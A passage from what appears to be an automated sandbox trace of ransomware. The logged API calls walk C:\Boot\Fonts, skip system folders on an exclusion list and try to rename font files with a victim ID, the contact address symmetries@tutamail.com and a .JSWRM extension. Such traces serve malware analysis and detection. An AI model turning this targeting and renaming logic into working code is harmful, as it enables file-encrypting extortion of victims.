hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0063.836] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2=".") returned 1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="..") returned 1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="...") returned 1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="windows") returned -1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="recovery") returned -1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="perflogs") returned -1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="documents and settings") returned 1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="system volume information") returned -1 [0063.836] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="msocache") returned -1 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kor_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kor_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kor_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0063.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.837] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.840] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243128) returned 0 [0063.840] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.840] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.840] CloseHandle (hObject=0xffffffff) returned 1 [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0063.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232f58 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0063.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.841] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.841] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2=".") returned 1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="..") returned 1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="...") returned 1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="windows") returned -1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="recovery") returned -1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="perflogs") returned -1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="documents and settings") returned 1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="system volume information") returned -1 [0063.841] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="msocache") returned -1 [0063.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgunn_boot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgunn_boot.ttf", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="malgunn_boot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgunn_boot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgunn_boot.ttf", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="malgunn_boot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.842] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.843] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234338328) returned 0 [0063.843] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.843] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.843] CloseHandle (hObject=0xffffffff) returned 1 [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0063.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0063.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225b30 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0063.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225b30 | out: hHeap=0x1e0000) returned 1 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.844] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\malgunn_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.844] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2=".") returned 1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="..") returned 1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="...") returned 1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="windows") returned -1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="recovery") returned -1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="perflogs") returned -1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="documents and settings") returned 1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="system volume information") returned -1 [0063.844] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="msocache") returned -1 [0063.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgun_boot.ttf", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgun_boot.ttf", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="malgun_boot.ttf", lpUsedDefaultChar=0x0) returned 15 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgun_boot.ttf", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="malgun_boot.ttf", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="malgun_boot.ttf", lpUsedDefaultChar=0x0) returned 15 [0063.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.845] CreateFileW (lpFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.864] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.864] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.864] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.864] CloseHandle (hObject=0xffffffff) returned 1 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0063.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0063.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0063.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0063.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0063.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.865] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\malgun_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0063.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.865] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2=".") returned 1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="..") returned 1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="...") returned 1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="windows") returned -1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="recovery") returned -1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="perflogs") returned -1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="documents and settings") returned 1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="system volume information") returned -1 [0063.865] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="msocache") returned -1 [0063.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryon_boot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meiryon_boot.ttf", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meiryon_boot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 